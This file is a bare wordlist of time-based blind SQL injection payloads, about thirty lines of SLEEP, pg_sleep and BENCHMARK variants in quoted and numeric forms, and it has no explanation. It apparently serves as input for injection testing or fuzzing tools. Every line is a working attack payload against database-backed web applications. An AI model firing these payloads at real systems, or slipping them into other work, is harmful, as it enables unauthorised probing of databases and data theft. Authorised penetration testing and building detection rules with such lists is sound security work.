';SELECT CASE WHEN (1=1) THEN pg_sleep(10) ELSE pg_sleep(0) END--
' AND SLEEP(5) -- 
" AND SLEEP(5) -- 
' OR SLEEP(5) -- 
" OR SLEEP(5) -- 
' AND IF(1=1, SLEEP(5), 0) -- 
" AND IF(1=1, SLEEP(5), 0) -- 
' AND (SELECT SLEEP(5)) -- 
" AND (SELECT SLEEP(5)) -- 
' OR BENCHMARK(5000000,MD5(1234)) -- 
" OR BENCHMARK(5000000,MD5(1234)) -- 
' OR IFNULL(NULL,SLEEP(5)) -- 
" OR IFNULL(NULL,SLEEP(5)) -- 
' OR ELT(1=1,SLEEP(5)) -- 
" OR ELT(1=1,SLEEP(5)) -- 
' OR CASE WHEN (1=1) THEN SLEEP(5) ELSE 0 END -- 
" OR CASE WHEN (1=1) THEN SLEEP(5) ELSE 0 END -- 
1 AND SLEEP(5) -- 
1 OR SLEEP(5) -- 
1 AND IF(1=1, SLEEP(5), 0) -- 
1 OR IF(1=1, SLEEP(5), 0) -- 
1 AND (SELECT SLEEP(5)) -- 
1 OR BENCHMARK(5000000,MD5(1234)) -- 
1 OR IFNULL(NULL,SLEEP(5)) -- 
1 OR ELT(1=1,SLEEP(5)) -- 
1 OR CASE WHEN (1=1) THEN SLEEP(5) ELSE 0 END -- 
';SELECT CASE WHEN (1=1) THEN pg_sleep(10) ELSE pg_sleep(0) END--
